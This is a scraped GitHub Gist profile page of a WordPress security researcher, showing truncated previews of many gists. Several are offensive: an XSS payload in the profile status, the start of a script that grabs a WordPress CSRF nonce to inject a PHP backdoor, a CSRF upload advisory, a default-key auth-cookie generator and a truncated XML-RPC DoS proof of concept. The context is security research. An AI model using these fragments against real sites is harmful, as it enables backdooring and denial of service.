Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"

Ryan Dewhurst ethicalhack3r

💭
"><img src=x onerror=alert('Github @ethicalhack3r')><"
View GitHub Profile
@ethicalhack3r
ethicalhack3r / chrome-uri.txt
Last active Apr 11, 2018
Chrome 'protocol handlers' extracted from Google Chrome browser source code (chromium-50.0.2624.0.tar.xz downloaded from https://gsdview.appspot.com/chromium-browser-official/). A lot will not work, some are probably from unit tests.
View chrome-uri.txt
chrome://-alkuisissa
chrome://-nettadresser
chrome://-webbadresser
chrome://ChromeTestChromeWebUIControllerFactory
chrome://DummyURL
chrome://URLs
chrome://about
chrome://accessibility
chrome://anything
chrome://app-list
@ethicalhack3r
ethicalhack3r / backdoor.js
Last active Feb 3, 2021
wp backdoor exploit (injects a PHP backdoor)
View backdoor.js
var wpnonce = '';
function getCSRFNonce(callback)
{
var re = /<input type="hidden" id="_wpnonce" name="_wpnonce" value="(\w*)" \/>/
var xhr = new XMLHttpRequest();
xhr.open("GET", "http://mywordpress.com/wordpress/wordpress-475/wp-admin/theme-editor.php?file=index.php&theme=twentyseventeen", true);
xhr.withCredentials = true;
xhr.overrideMimeType('text/xml');
View post.txt
When you first release software online you don't put too much thought into the software license (I didn't at least). You have no idea if the project will take off. If your intention is for your peers to use it freely your first thought may be Open Source. The most popular Open Source license is the GNU GPL, so why not use that!?
I released WPScan on the 16th of June 2011 along with the GNU GPL license. After a while I built up a team, The WPScan Team, which were people who had the same goals as me, to make an awesome black box WordPress scanning tool. The WPScan Team (3 other awesome people) and I have been working on WPScan in our spare time as volunteers for almost 4 years. Countless hours, days, weeks and months of man hours have been put into WPScan and recently the WPScan Vulnerability Database by us.
And we don't mind this, we do it because we want our peers to be able to use the software freely. We do it because we want to use the software ourselves. Of course there is no selfless deed, we do it for
@ethicalhack3r
ethicalhack3r / license.txt
Created Jan 21, 2015
WPScan Public Source License
View license.txt
WPScan Public Source License
The WPScan software (henceforth referred to simply as "WPScan") is dual-licensed - Copyright 2011-2015 WPScan Team.
Cases that include commercialization of WPScan require a commercial, non-free license. Otherwise, WPScan can be used without charge under the terms set out below.
Definitions
“License” means this document.
“Contributor” means each individual or legal entity that creates, contributes to the creation of, or owns WPScan.
View gist:66de53fb6a110f2834b9
http://theantisocialengineer.com/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=AAF49566F17ED862F20934A0501A97C9&r=0.5144356689415872
@ethicalhack3r
ethicalhack3r / advisory
Created Dec 6, 2014
Satoshi v2.0 - CSRF
View advisory
Theme Name: Satoshi v2.0
Theme URI: http://www.vooshthemes.com
Description: A Free Portfolio Theme Developed By Voosh Themes. Please look at the <a href="../wp-content/themes/satoshi/instructions/instructions.html">instructions</a> that are included with the file you downloaded <a href="../wp-content/themes/satoshi/instructions/instructions.html">(satoshi/instructions/instructions.html)</a> for details about how to configure this theme.
Author: Voosh Themes
Author URI: http://www.vooshthemes.com
wp-content/themes/satoshi/upload-file.php vulnerable to CSRF file upload via ajaxupload.3.5.js
Localhost Demo:
@ethicalhack3r
ethicalhack3r / pluggable.php
Created Nov 18, 2014
WordPress authentication cookie generation using default keys
View pluggable.php
<?php
if ( !function_exists('wp_generate_auth_cookie') ) :
/**
* Generate authentication cookie contents.
*
* @since 2.5.0
*
* @param int $user_id User ID
* @param int $expiration Cookie expiration in seconds
View gist:cb06f575c6ba28644e9a
$ ./dnsrecon.py -d jamiehankins.co.uk
[*] Performing General Enumeration of Domain: jamiehankins.co.uk
[-] DNSSEC is not configured for jamiehankins.co.uk
[*] SOA hank.ns.cloudflare.com 173.245.59.116
[*] SOA hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] NS hank.ns.cloudflare.com 173.245.59.116
[*] NS hank.ns.cloudflare.com 2400:cb00:2049:1::adf5:3b74
[*] NS lucy.ns.cloudflare.com 173.245.58.133
[*] NS lucy.ns.cloudflare.com 2400:cb00:2049:1::adf5:3a85
[*] MX aspmx2.googlemail.com 74.125.143.27
@ethicalhack3r
ethicalhack3r / test.html
Created Sep 18, 2014
Entering version numbers in HTML form
View test.html
<!DOCTYPE html>
<html>
<body>
<input type="text" name="version1" value="1.0">
<select>
<option value="&lt;">&lt;</option>
<option value="&gt;">&gt;</option>
<option value="=">=</option>
@ethicalhack3r
ethicalhack3r / wp_dos.py
Created Aug 7, 2014
WP XML-RPC DoS Exploit
View wp_dos.py
#################################################################################
# CVE-XXXXX Wordpress and Drupal XML Blowup Attack DoS#
# Author: Nir Goldshlager - Salesforce.com Product Security Team#
# This is a Proof of Concept Exploit, Please use responsibly.#
#################################################################################
#!/usr/bin/env python
from __future__ import print_function
import threading
import time
import urllib